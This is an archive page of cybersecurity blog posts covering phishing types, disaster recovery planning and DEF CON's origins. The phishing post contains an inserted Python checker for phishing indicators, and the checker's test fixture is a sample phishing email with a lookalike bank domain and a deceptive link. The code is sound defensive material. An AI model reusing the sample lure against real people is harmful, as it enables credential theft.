Below are some great resources and studies to check out regarding public Wi-Fi:


(PDF) Why do people use unsecure public Wi-Fi? An investigation of behaviour and factors driving decisions

Public Wi-Fi - Get Cyber Safe


https://irjhis.com/paper/IRJHISIC2203054.pdf


Until next time, stay safe out there… and online!


AUG 24, 2022

Let’s Talk About Phishing

by Eula Chua

August 24, 2022

Did you know there are different kinds of phishing attacks that exist? First, let’s define what phishing means.

According to Phishing.org, phishing is “a cybercrime in which a target or targets are contacted by email, telephone or text message by someone posing as a legitimate institution to lure individuals into providing sensitive data such as personally identifiable information, banking and credit card details, and passwords.”

Phishing is one of the most common ways for cyber attackers to target people online via email. Many times, this type of attack is used on specific groups of people or high-profile individuals to gain personal information and, most of the time, for financial gain.

As phishing continues to adapt, cyber attackers have found other communication pathways to trick users into providing information. Some examples are voice messages, SMS text messages, and phishing through search engines. There are multiple ways in which phishing techniques are conducted; however, in today’s blog, we will be focusing on the different types: email phishing, vishing, smishing, spearphishing, and whaling.


Email phishing

When we hear phishing, we automatically think of email phishing. That’s because it is the most common technique used to conduct a phishing attack. If you check your spam/junk folder right now, you might notice emails coming from unknown email addresses with odd subject lines. There could also be emails coming from people you think you know. Beware that the purpose of phishing is to trick users into revealing personal information and believing that the sender or organization is legitimate. How is this conducted? Usually, phishing attacks that are done through email contain links that lead to a malicious website that appears legitimate. These websites could either load a trojan or present a form that prompts you to enter your credentials. Other emails could contain malicious attachments.
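Two of the signs described above, a sender who claims to be an organization they are not, and a link whose visible text points somewhere other than where it really goes, can be checked mechanically. The following is an added example, not code from the original post or from Cybersecurity Central: a small checker that parses one email message and reports those indicators, plus links served over plain http. The `WATCHED_BRANDS` table, the two sample messages, the lookalike domains in them, and the function names are all constructed for this example.

```python
import email
from email import policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Brands to watch, mapped to the domain that legitimately sends mail for them.
# Constructed for the example; a real deployment would load this from config.
WATCHED_BRANDS = {"example bank": "example-bank.test"}

# Constructed sample: the display name claims the bank, the address domain is a
# lookalike, and the visible link text shows the bank's URL while the real href
# points at a different host over plain http.
SAMPLE_EMAIL = """\
From: "Example Bank Security" <alerts@mail-examp1e-bank.test>
To: customer@example.org
Subject: Urgent: verify your account now
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Please <a href="http://login.examp1e-bank.test/verify">https://www.example-bank.test/login</a>
to confirm your details.</p>
</body></html>
"""

# Constructed clean counterpart: same brand, legitimate domain, honest link.
CLEAN_EMAIL = """\
From: "Example Bank" <alerts@example-bank.test>
To: customer@example.org
Subject: Your monthly statement is ready
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Sign in at <a href="https://www.example-bank.test/login">https://www.example-bank.test/login</a>.</p>
</body></html>
"""


class LinkCollector(HTMLParser):
    """Collects (href, visible text) for every <a> element in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def host_of(url):
    """Hostname of a URL, tolerating a missing scheme; '' if there is none."""
    if "://" not in url:
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()


def same_org(domain, trusted):
    return domain == trusted or domain.endswith("." + trusted)


def phishing_indicators(raw, brands=WATCHED_BRANDS):
    """Return human-readable findings for one message; an empty list means
    none of the checked indicators fired (not that the mail is safe)."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []

    # 1. Display name trades on a watched brand, but the address is elsewhere.
    display, addr = parseaddr(str(msg["From"]))
    addr_domain = addr.rsplit("@", 1)[-1].lower()
    for brand, trusted in brands.items():
        if brand in display.lower() and not same_org(addr_domain, trusted):
            findings.append(f"display name '{display}' but sender domain '{addr_domain}'")

    # 2. Links whose visible text names one host while the href goes to another,
    #    and links that are plain http at all.
    body = msg.get_body(preferencelist=("html",))
    if body is not None:
        collector = LinkCollector()
        collector.feed(body.get_content())
        for href, text in collector.links:
            shown = host_of(text) if "." in text else ""  # only if the text looks like a URL
            if shown and shown != host_of(href):
                findings.append(f"link text shows '{shown}' but href goes to '{host_of(href)}'")
            if href.lower().startswith("http://"):
                findings.append(f"link is plain http, not https: {href}")
    return findings


if __name__ == "__main__":
    for name, raw in (("sample", SAMPLE_EMAIL), ("clean", CLEAN_EMAIL)):
        print(name, phishing_indicators(raw) or ["no indicators"])
```

The checks are deliberately narrow: they catch the two patterns the paragraph describes and nothing more, so a mail that passes them is not thereby safe. A mail-gateway rule or a user-facing warning would combine findings like these with authentication results (SPF, DKIM, DMARC) and attachment scanning rather than rely on any one signal.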


Vishing aka. Voice phishing

Vishing is a combination of “voice” and “phishing”. This occurs when a “phisher” utilizes a phone system to lure their targets into providing their personal information or credentials, mainly for financial gain. VoIP (Voice over IP) technology is often used for these attacks because it’s easier for the attacker to pretend that they are from an actual known company, by spoofing their caller ID.


Smishing aka. SMS phishing

“SMS” and “phishing” make up the term “Smishing”. Rather than it being done through email, phishing is done via text message. With the same purpose of gaining personal or financial information from a target, malicious links and attachments can also be sent through text. Smishing can also be used to obtain verification codes if the target’s phone is used for multi-factor authentication for their credentials.


Spearphishing vs. Whaling

If you get these two terms mixed up, you are not alone. Let’s go over the main differences.

Spearphishing is a specific type of phishing in which an attack is conducted on a particular person or specific groups of users, most often within an organization.

Whaling is a specific type of spearphishing, where a high-level executive is either the victim or the one being impersonated.

There are so many different ways a phishing attack can be done. End-user security awareness is crucial to our online safety and privacy, as phishing attempts occur every minute of every day.


As end-users, how can we do our part to prevent these phishing attacks from progressing?



If you would like to learn more about phishing, here are some great resources to visit:

- https://www.getcybersafe.gc.ca/en/blogs/phishing-introduction

- https://phishing.org

- https://www.microsoft.com/en-ca/security/business/security-101/what-is-phishing

- https://cybersecurityguide.org/resources/phishing/

- https://www.phishprotection.com/resources/what-is-phishing/

Why Every Organization Needs a Disaster Recovery / Business Continuity Plan 

by James Driscoll

August 24, 2022

Disasters, whether natural or man-made, are inevitable. Every company, no matter the size or location, is going to experience one. How quickly they recover, if at all, depends on whether they have a Business Continuity / Disaster Recovery Plan (BC / DRP). According to the American Management Association, half of the businesses that do not have a BC / DRP and experience a disaster close their doors forever (An Overview of U.S. Regulations Pertaining to Business Continuity, n.d.).


For a BC / DR plan to be successful the following five steps should be taken:


1. Be proactive with planning – Basically, this means creating a list of as many conceivable disasters as possible. Imagination is the only limiting factor here, as long as the disaster is actually conceivable; a company in North Dakota planning for a hurricane, for example, is not.

2. Identify the organization's critical functions and infrastructure – This is the time a company would conduct a business impact analysis. This serves two purposes. First, critical functions can be discovered. Second, the company can make educated guesses about the causes of disruptions and the repercussions of those disruptions.

3. Create emergency response policies and procedures – This is the meat and potatoes of the process: creating the BC / DR plan based on the information from steps one and two while also considering any applicable government regulations.

4. Document the backup and restoration process – This involves writing down the procedures for backing up the company's data prior to a disaster and subsequently restoring it during the recovery phase after a disaster.

5. Perform tests and exercises – A plan is worthless if the employees are unfamiliar with it or do not even know it exists. This is where testing comes in. Testing a plan makes the employees familiar with it, which results in them being able to respond more quickly. This is paramount in a disaster, where time is critical. It also shows where there are holes in the plan so they can be fixed before a disaster occurs (Delchamps, 2020).


When creating the BC plan, one of the main things to consider is the backup location. This location may have its own risks from disasters that need to be anticipated. Six items that need to be considered when choosing a backup location include:


1. Natural Disaster – Depending on the location, especially if it is close to the primary location, the company could be faced with a disaster-within-the-disaster, resulting in both locations being taken offline. The way to mitigate this, if feasible, is to pick a location further away.

2. Infrastructure Disruption – This would be the result of damage to infrastructure, for example loss of power or road closures. The mitigation for loss of power is for the company to invest in backup generators. The mitigation for road closures is to have a backup location that can be reached via multiple routes, or to find a location close enough that employees may be able to walk to the site.

3. Human Error – Humans are not psychic. Information needs to be passed to us. A company may have the best BC / DR plan ever created; however, if the employees do not know anything about it, it is worthless. The way to mitigate this is through communication.

4. Cyber Attack – While transferring the data to the backup site, companies need to ensure that their customers' information is safe and not going to be subject to a cyber-attack. This can be mitigated by ensuring devices at the backup location are constantly patched and updated, anti-virus is used, and data is encrypted.

5. Compliance – No matter where the company is operating from, whether it is the primary location or the backup site, it still needs to comply with all applicable regulations. The way to achieve that is to treat the backup site the same as the primary location. That means whenever something is done to the primary location, it is also done to the backup location.

6. Physical Security – Physical security is just as important as securing the company's data. There are a couple of ways to achieve this. The company could invest in a security system that includes cameras. Another way is to hire security guards to monitor the building (Sampera, 2020).


References:

An Overview of U.S. Regulations Pertaining to Business Continuity. (n.d.). Retrieved from Geminare: https://www.geminare.com/wp-content/uploads/U.S._Regulatory_Compliance_Overview.pdf

Delchamps, H. (2020, March 9). 5 Steps to Creating a Backup and Disaster Recovery Plan. Retrieved from Memphis Business Journal: https://www.bizjournals.com/memphis/news/2020/03/09/5-steps-to-creating-a-backup-and-disaster-recovery.html

Sampera, E. (2020, March 5). 6 Essential Risk Mitigation Strategies for Your Business. Retrieved from VXchange: https://www.vxchnge.com/blog/essential-risk-mitigation-strategies

AUG 17, 2022

DEF CON: The Beginning

by James Driscoll

August 17, 2022

DEF CON was this past weekend and I started wondering about how it started and when. So, I decided this would be an awesome topic, although I wish I had had the idea before last week's blog went out.


Now, I do not know about anyone else, but I have always wondered not only how DEF CON originated but also how the name originated. As you will discover below, it is quite interesting.


It turns out that the name did not originate where I thought it did. With a 20-year career in the Air Force, it was my impression that DEF CON was taken from the term for Defense Readiness Condition. While this is accurate, that term was the inspiration only by way of the 1980s movie “WarGames”. The basic premise of this movie is that a young kid connects to a government system that controls the United States nuclear arsenal. If I had to guess, I would say that it is probably the original hacking movie, but I digress a little bit. It turns out that in the current context, DEF derives from the number three key on a telephone and CON derives from the word conference. Interesting side note: the official spelling is DEF CON.